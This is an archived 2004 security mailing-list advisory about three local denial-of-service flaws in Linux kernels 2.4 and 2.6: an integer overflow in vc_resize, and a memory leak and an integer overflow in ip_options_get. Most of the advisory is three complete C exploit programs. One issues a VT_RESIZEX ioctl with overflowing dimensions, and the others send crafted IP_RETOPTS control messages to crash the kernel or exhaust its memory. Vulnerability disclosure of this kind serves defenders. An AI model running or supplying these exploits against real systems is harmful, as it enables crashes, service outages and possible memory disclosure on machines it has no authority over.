The OpenNET Project
 
Search (keywords):  SOFT ARTICLES TIPS & TRICKS SECURITY
LINKS NEWS MAN DOCUMENTATION


[EXPL] Linux Kernel Multiple Local DoS (vc_resize, ip_options_get)


<< Previous INDEX Search src Set bookmark Go to bookmark Next >>
Date: 16 Dec 2004 11:31:06 +0200
From: SecuriTeam <support@securiteam.com.>
To: [email protected]
Subject: [EXPL] Linux Kernel Multiple Local DoS (vc_resize, ip_options_get)

The following security advisory is sent to the securiteam mailing list, and can be found at the SecuriTeam web site: http://www.securiteam.com
- - promotion

The SecuriTeam alerts list - Free, Accurate, Independent.

Get your security news from a reliable source.
http://www.securiteam.com/mailinglist.html 

- - - - - - - - -




  Linux Kernel Multiple Local DoS (vc_resize, ip_options_get)
------------------------------------------------------------------------


SUMMARY

Three vulnerabilities have been found in the Linux Kernel, an integer 
overflow in the vc_resize function, a memory leak in ip_options_get and an 
integer overflow in ip_options_get. The vulnerabilities can at the very 
least be used to cause a denial of service, in one case you can use it to 
reveal arbitrary segments of the memory.

DETAILS

Vulnerable Systems:
 * Linux kernel version 2.6 up to 2.6.9 (inclusive)
 * Linux kernel version 2.4 up to 2.4.28 (inclusive)

Exploit (vc_resize):
/* vc_resize int overflow
 * Copyright Georgi Guninski
 * Cannot be used in vulnerability databases
 * */
#include <stdio.h>
#include <stdlib.h>
#include <sys/types.h>
#include <sys/stat.h>
#include <fcntl.h>
#include <linux/vt.h>
#include <sys/vt.h>
#include <sys/ioctl.h>
#include <string.h>
#include <unistd.h>

int main(int ac, char **av)
{
int fd;
struct vt_consize vv;
int cou=4242;

fd=open("/dev/tty",O_RDWR);
if (fd<0) {perror("open");return -42;}
memset(&vv,0,sizeof(vv));
vv.v_clin=0;
vv.v_vcol=0;
vv.v_ccol=0;

/* magic values, overflow on i386*/
vv.v_rows=65535;
vv.v_cols=32769;

system("sync");
if (ioctl(fd,VT_RESIZEX,&vv) < 0) {perror("ioctl");return -4242;}
while(cou--) printf(";)\n");
close(fd);
return 42;
}

Exploit (ip_options_get):
/* memory leak
 * Copyright Georgi Guninski
 * Cannot be used in vulnerability databases (like securityfocus and 
mitre)
 * */
#include <unistd.h>
#include <stdlib.h>
#include <stdio.h>
#include <errno.h>
#include <ctype.h>
#include <string.h>
#include <sys/types.h>
#include <sys/socket.h>
#include <netinet/in.h>
#include <arpa/inet.h>

int main(int ac,char **av)
{
struct msghdr msghdr;
struct iovec iovector[10];
int i,s,j,ma;
struct sockaddr_in sockad;
char msg[128];
struct cmsghdr *cmsg,*cm2;
char opts[24];

ma=250;
printf("just wait and watch memory usage\n");

memset(opts,0,sizeof(opts));

while(42)
{
s=socket(PF_INET, /*SOCK_STREAM*/ SOCK_DGRAM, 0);
sockad.sin_family = AF_INET;
sockad.sin_addr.s_addr=inet_addr("127.0.0.1");
sockad.sin_port=htons(8080);

connect(s,(struct sockaddr *) &sockad, sizeof(sockad));

memset(msg,'v',sizeof(msg));
#define VV (ma*(sizeof(struct cmsghdr)+sizeof(opts))+1024*1024)
cmsg = malloc(VV);
memset(cmsg,0,VV);
cmsg->cmsg_len = sizeof(struct cmsghdr) + sizeof(opts);
cmsg->cmsg_level = SOL_IP;
cmsg->cmsg_type = IP_RETOPTS;
memcpy(CMSG_DATA(cmsg), opts, sizeof(opts));

cm2= (struct cmsghdr *) (long) ((char *)CMSG_DATA(cmsg)+sizeof(opts));
for(j=0;j<ma;j++)
{
cm2->cmsg_level = SOL_IP;
cm2->cmsg_type = IP_RETOPTS;
cm2->cmsg_len = sizeof(struct cmsghdr) + sizeof(opts);
cm2= (struct cmsghdr *) (long) ((char *)CMSG_DATA(cm2)+sizeof(opts));
}

cm2->cmsg_level = SOL_IP;
cm2->cmsg_type = IP_RETOPTS;
cm2->cmsg_len = sizeof(struct cmsghdr) + 8;

msghdr.msg_name = &sockad;
msghdr.msg_namelen = sizeof(sockad);

msghdr.msg_control=cmsg;
msghdr.msg_controllen= cmsg->cmsg_len + (j)*cmsg->cmsg_len+cm2->cmsg_len;
msghdr.msg_iov = iovector;

msghdr.msg_iovlen = 1;
iovector[0].iov_base = msg;
iovector[0].iov_len = sizeof(msg);

if ((i = sendmsg(s, &msghdr, 0)) < 0)
{perror("sendmsg");return -42;}

close(s);
free(cmsg);
}
return 42;
}

/* int overflow in ip_options_get
 * Copyright Georgi Guninski
 * Cannot be used in vulnerability databases (like securityfocus and 
mitre)
 * */
#include <unistd.h>
#include <stdlib.h>
#include <stdio.h>
#include <errno.h>
#include <ctype.h>
#include <string.h>
#include <sys/types.h>
#include <sys/socket.h>
#include <netinet/in.h>
#include <arpa/inet.h>

int main(int ac,char **av)
{
struct msghdr msghdr;
struct iovec iovector[10];
int i,s;
struct sockaddr_in sockad;
char msg[128];
struct cmsghdr *cmsg,*cm2;
char opts[12];

s=socket(PF_INET, /*SOCK_STREAM*/ SOCK_DGRAM, 0);
sockad.sin_family = AF_INET;
sockad.sin_addr.s_addr=inet_addr("127.0.0.1");
sockad.sin_port=htons(8080);

connect(s,(struct sockaddr *) &sockad, sizeof(sockad));

memset(msg,'v',sizeof(msg));
memset(opts,0,sizeof(opts));
#define VV 1024*1024
cmsg = malloc(VV);
memset(cmsg,0,VV);
cmsg->cmsg_len = sizeof(struct cmsghdr) + sizeof(opts);
cmsg->cmsg_level = SOL_IP;
cmsg->cmsg_type = IP_RETOPTS;
memcpy(CMSG_DATA(cmsg), opts, sizeof(opts));
cm2= (struct cmsghdr *) (long) ((char *)CMSG_DATA(cmsg)+sizeof(opts));
cm2->cmsg_level = SOL_IP;
cm2->cmsg_type = IP_RETOPTS;
cm2->cmsg_len = -1;

msghdr.msg_name = &sockad;
msghdr.msg_namelen = sizeof(sockad);

msghdr.msg_control=cmsg;
msghdr.msg_controllen= cmsg->cmsg_len + 420;
msghdr.msg_iov = iovector;

msghdr.msg_iovlen = 1;
iovector[0].iov_base = msg;
iovector[0].iov_len = sizeof(msg);
system("sync");
if ((i = sendmsg(s, &msghdr, 0)) < 0)
 perror("sendmsg");
return 42;
}


ADDITIONAL INFORMATION

The information has been provided by  <mailto:guninski@guninski.com.> 
Georgi Guninski.
The original article can be found at:  
<http://www.guninski.com/where_do_you_want_billg_to_go_today_2.html>; 
http://www.guninski.com/where_do_you_want_billg_to_go_today_2.html




This bulletin is sent to members of the SecuriTeam mailing list. To unsubscribe from the list, send mail with an empty subject line and body to: [email protected] In order to subscribe to the mailing list, simply forward this email to: [email protected]

DISCLAIMER: The information in this bulletin is provided "AS IS" without warranty of any kind. In no event shall we be liable for any damages whatsoever including direct, indirect, incidental, consequential, loss of business profits or special damages.

<< Previous INDEX Search src Set bookmark Go to bookmark Next >>



Партнёры:
PostgresPro
Inferno Solutions
Hosting by Hoster.ru
Хостинг:

Закладки на сайте
Проследить за страницей
Created 1996-2024 by Maxim Chirkov
Добавить, Поддержать, Вебмастеру